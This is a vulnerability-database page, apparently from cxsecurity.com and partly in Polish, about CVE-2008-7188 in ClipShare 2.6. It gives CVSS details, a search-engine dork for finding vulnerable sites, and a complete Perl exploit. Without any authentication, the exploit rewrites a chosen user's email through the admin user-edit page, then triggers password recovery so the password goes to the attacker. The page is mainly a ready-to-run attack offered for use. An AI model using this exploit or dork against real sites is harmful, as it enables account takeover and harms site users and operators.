Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
ClipShare 2.6 Remote User Password Change Exploit
2009-09-10 / 2012-01-30
Credit:
Pr0metheuS
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-7188
CWE:
CWE-264
Dork:
\"Powered by Clipshare\"
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
#!/usr/bin/perl -w #priv8 #Pr0metheuS #Exploit Name: Clipshare Remote User Password Change Exploit #Version Script: Clipshare 2.6 #Dork: "Powered by Clipshare" #EnjoY print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"; print "\nClipshare 2.6 Remote User Passord Change Exploit\n"; print "\nBy Pr0metheuS \n"; print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n"; print "Site Address:\n"; $SITE = <STDIN>; chomp $SITE; print "Path to Site:\n"; $PATH = <STDIN>; chomp $PATH; print "ID user:\n"; $ID = <STDIN>; chomp $ID; print "Your Email(to send user password):\n"; $EM = <STDIN>; chomp $EM; use LWP::UserAgent; $ua = new LWP::UserAgent; $ua->agent("Mozilla/8.0"); $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(POST => "$SITE$PATH/siteadmin/useredit.php?action=edit&uid=$ID"); $req->content_type('application/x-www-form-urlencoded'); $req->content("email=$EM&fname=&lname=&city=&country=United+States&website=&occupation=&company=&school=&interest_hobby=&fav_movie_show=&fav_book=&fav_music=&aboutme=&emailverified=no&account_status=Active&submit=Update"); $res = $ua->request($req); if (($res->content =~ /$EM/)) { print "Update!\n"; use LWP::UserAgent; $ua2 = new LWP::UserAgent; $ua2->agent("Mozilla/8.0"); $ua2 = LWP::UserAgent->new; my $req2 = HTTP::Request->new(POST => "$SITE$PATH/recoverpass.php"); $req2->content_type('application/x-www-form-urlencoded'); $req2->content("email=$EM&recover=Submit"); $res = $ua2->request($req2); print "Check your Email!\n"; } else{ print "Wrong ID or path!"; }
Referencje:
http://xforce.iss.net/xforce/xfdb/39494
http://www.securityfocus.com/bid/27148
http://www.milw0rm.com/exploits/4837
http://secunia.com/advisories/28313
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top